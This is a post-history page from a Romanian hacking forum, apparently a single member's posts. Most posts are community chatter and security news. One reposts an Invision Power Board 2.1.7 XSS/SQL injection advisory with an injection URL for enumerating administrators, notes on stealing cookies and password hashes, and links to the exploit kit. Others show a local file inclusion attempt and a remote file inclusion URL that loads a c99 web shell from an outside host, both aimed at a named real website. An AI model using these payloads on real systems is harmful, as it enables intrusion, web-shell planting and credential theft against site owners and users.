
kw3rln
Active Members-
Posts
1019 -
Joined
-
Last visited
Everything posted by kw3rln
-
http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=64
-
http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=63
-
bravo ! http://rstcenter.com/index.php?pagina=tutoriale&selecteaza=tutorial&id=60
-
----[ INVISION POWER BOARD 2.1.7 EXPLOIT ... ITDefence.ru Antichat.ru ] INVISION POWER BOARD 2.1.7 ACTIVE XSS/SQL INJECTION Eugene Minaev underwater@itdefence.ru ___________________________________________________________________ ____/ __ __ _______________________ _______ _______________ \ \ \ / .\ / /_// // / \ \/ __ \ /__/ / / / /_// /\ / / / / /___/ \/ / / / / /\ / / / / / \/ / / / / /__ //\ \ / ____________/ / \/ __________// /__ // / /\\ \_______/ \________________/____/ 2007 /_//_/ // //\ \ \\ // // / .\ \\ -[ ITDEFENCE.ru Security advisory ]- // // / . . \_\\________[________________________________________]_________//_//_/ . . ----[ NITRO ... ] This vulnerability was already found before, but there was no available public "figting" exploit for it. This POC consists of several parts - active xss generator, JS-file, which will be caused at visiting page with xss, log viewer and special component, which will take necessary data from MySQL forum's tables in case if intercepted session belonged to the person with moderator privileges. ----[ ANALYSIS ... ] XSS.php is one of the most important part of IPB 2.1.7 POC package, as it generates xss for future injetion on the forum board. As the reference it is necessary to specify the full way up to ya.js file (in which you have already preliminary corrected way on your own). Most likely it is necessary only to press the button. The injection can be executed only when there is available session of the user with access in moderator's panel.It is necessary to result "starter" parameter to numerical by means of "intval" function.In case of successfull injection there is an oppotunity to enumerate forums' administrators team: index.php?act=mod&f=-6&CODE=prune_finish&pergo=50¤t=50&max=3&starter=1+union+select+1/* ----[ RECORD ... ] { ---IP ADDRESS sniffed ip address ---REFERER xssed theme ---COOKIES xssed cookies of forum member ---USER ID xssed user id of forum member ---ADMIN NAME admin username ---ADMIN PASS admin pass hash ---ADMIN SALT admin hash salt } ----[ PATCH ... ] FILE sources/classes/bbcode/class_bbcode_core.php FUNCTION regex_check_image LINE 924 REPLACE if ( preg_match( "/[?&;]/", $url) ) ON if ( preg_match( "/[?&;\<\[]/", $url) ) FILE sources/classes/bbcode/class_bbcode_core.php FUNCTION post_db_parse_bbcode LINE 486 REPLACE preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); ON preg_match_all( "#(\[$preg_tag\])((?!\[/$preg_tag\]).+?)?(\[/$preg_tag\])#si", $t, $match ); if ( $row['bbcode_tag'] == 'snapback' ) { $match[2][$i] = intval( $match[2][$i] ); } www.underwater.itdefence.ru/isniff.rar www.milw0rm.com/sploits/2008-isniff.rar ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] # milw0rm.com [2008-01-05]
-
daca am ajuns sa-mi fac tricou cu adresa unde stau nu e rau inca !
-
se poate face asa ceva dar nu prea merita ! asta ar merita la forumuri de warez sau ceva de genu
-
l33t pwner :twisted: nemessis watch your back
-
.. prima e tare tare lol... a doua
-
Punctele se calculeaza in felu urmator: Se inmulteste pageranku site-ului cu tipul bugului Punctele la tip sunt: Xss- 10, SQL -20 [doar sintaxa intreaga], RFI-25, LFI-15, CSRF- 15, Altul - 1 Care triseaza sau nu respecta "regulile" are ban 1 sapt la bug reports ! Verificati intotdeauna care mai exista sau nu bugul la acel site cu functia cauta ! Bankai: au fost sarbatorile
-
Vreau sa adaug blog la RST unde sa punem anunturile in legatura cu rst... ce functii am aduagat..module... ce probleme am avut ..blablabla Ma gandeam sa-l modific si sa fie ca TOTI USERII RST SA POATA AVEA BLOG.. Adica care vrea sa-si faca blog.. sa isi puna ideile...tutoriale de-ale lui sau chiar viata lui de zi cu zi sa o poata face pe rsT ! sa fie ceva gen: http://rstcenter.com/blog/[nickname]/
-
Scriptul de bug_reports a fost scris de slick..apoi l-am modificat eu sa fie compatibil cu cms-ul .. i-am dat access la sysghost care l-a imbunatatit .. acuma scriptul calculeaza singur pagerank si o gramada... si acuma 5 minute l-am pasat lui flama sa-l termine ca eu nu mai am timp si de el ! cand termina o sa fie 2 moderatori ! Flama si inca un membru RST[unu cu cur sanatos pt flama]!
-
"seful" unei firme care sponsorizeaza RST-ul cu bani la hosting..si alcool si tigari
-
lost point nu te-ai documentat deloc! Daca esti delogat .. cand intri pe EN Forumul apare tot in limba engleza si asta apare in limba romana ! Cand esti logat tu le vezi amandoua in limba romana deoarece AI SETAT la profil LIMBA ROMANA ! Daca vrei limba engleza intra la profil si vei reusi !
-
Autoritãþile ruse se apropie de autorii troianului Pinch Autoritãþile din Rusia i-au identificat pe autorii kit-ului de creare a malware-ului Pinch. Este de aºteptat sã urmeze arestãri în acest caz. Pinch reprezintã un set de unelte pentru crearea de troieni despre care se crede cã a fost utilizat de scriitorii de viruºi pentru a infecta milioane de computere. Acesta este vândut pe piaþa neagrã a forumurilor frecventate de hackeri. Aceºtia au comandat o versiune a troianului ºi au obþinut ºi „asistenþã tehnicã” de la autorii programului. Forumurile hacker-ilor din Rusia au fost invadate de reclame la acest „serviciu”. Compania rusã de securitate Kaspersky susþine cã autoritãþile ruse se apropie de cei care se aflã la originea malware-ului. Nikolay Patrushev, directorul Serviciilor de Securitate Federale din Rusia, a spus cã autorii troianului Pinch au fost identificaþi ca fiind doi forumiºti, care îºi spun Ermishkin ºi Farkhutdinov. „Investigaþia se va finaliza în curând ºi va ajunge în faþa instanþei”, a spus Patrushev. Oricum, aºa cum a remarcat Kaspersky, este puþin probabil ca acuzarea autorilor Pinch sã aibã un impact foarte puternic pe piaþa celor care realizeazã troieni pentru furtul de parole. „Din pãcate, nu înseamnã cã noile variante Pinch vor dispãrea. Din pãcate, sursa codului acestui troian circulã pe internet ºi vom regãsi cu siguranþã
-
Un vierme s-a rãspândit în reþeaua socialã Orkut, a celor de la Google, potrivit unei postãri de pe blogul Sounds from the Dungeon. Aparent inofensiv, viermele pare sã utilizeze cod JavaScript ºi Flash pentru a crea noi intrãri de tip scrapbook în profile, cu un mesaj de anul nou, în portughezã, înainte de a se propaga în calculatoarele prietenilor. Este posibil sã fi infectat aproximativ 400.000 de utilizatori, potrivit datelor publicate pe un blog denumit „c0d3w12”. Potrivit site-ului de securitate Packet Storm, o vulnerabilitate care afecta Orkut a fost descoperitã în 8 noiembrie ºi a fost rezolvatã sãptãmâna trecutã. Nu este foarte clar dacã aceastã vulnerabilitate este aceeaºi cu cea care a permis rãspândirea virusului. „Se pare cã Google a rãspuns rapid”, scrie un blogger pe ValleyWag. „Pãcat. Dacã ar fi lãsat viermele sã se rãspândeascã, probabil cã unii utilizatori americani ar fi auzit pentru prima datã despre Orkut.” Reprezentanþii Google nu au fãcut niciun fel de comentariu. Sursa: CHIP
-
sa-ti spun si aici pe forum: felicitari
-
acolo o sa fie un fel de blog..o sa scriem despre ce noutati apar pe rst.. ce tooluri si releaseuri..nimic interesant..
-
neatza... amu il fac mersi tw8 si nm
-
trebuie sa fac 6-7 atestate la prieteni + unul personal mersi de site-uri baieti dar is prea simple alea cred ca
-
Link: http://rstcenter.com/index.php?pagina=ip_domain Descriere: poti vedea ce site-uri se mai gazduiesc pe server la ce site doresti tu How? pai eram la flama acasa si le-a murit mod_rewrite parca la seologs.com ... anyway ne-o aratat sursa cod la toate tool-urile de la ei .. o sa mai punem cateva
-
citeste ca nu cred ca mai are careva video-ul
-
da la exploit nu m-am kinuit ff mult niciodata.. puteam face sa injecteze codu malicios in toate pathurile si apoi sa verifice el singur fiecare path in parte sa nu mai fie dat de user anyway exemplu? am facut un fisier in dirul adpics/kw3.php si contine "local file inclusion ! TESTING" http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3 daca dam http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3.php va incercat sa ne includa adpics/kw3.php.php si nu merge asa ca incercam metoda cu Null Byte %00 http://www.diasporaromana.com/index.php?view=page&pagename=adpics/kw3.php%00 Failed opening 'adpics/kw3.php\0.php' for inclusion in cazul acestui site nu merge deoarece magic_quotes_gpc ii on
-
care are niste proiecte ..atestate pt informatica? ... limbaj: php, foxpro, pascal si html
-
merge exploitul numa e mai complicat pana gasesti apache logu corect anyway exista RFi in acelasi soft: http://www.diasporaromana.com/config.inc.php?path_escape=http://hdtv-il.com/c99.txt?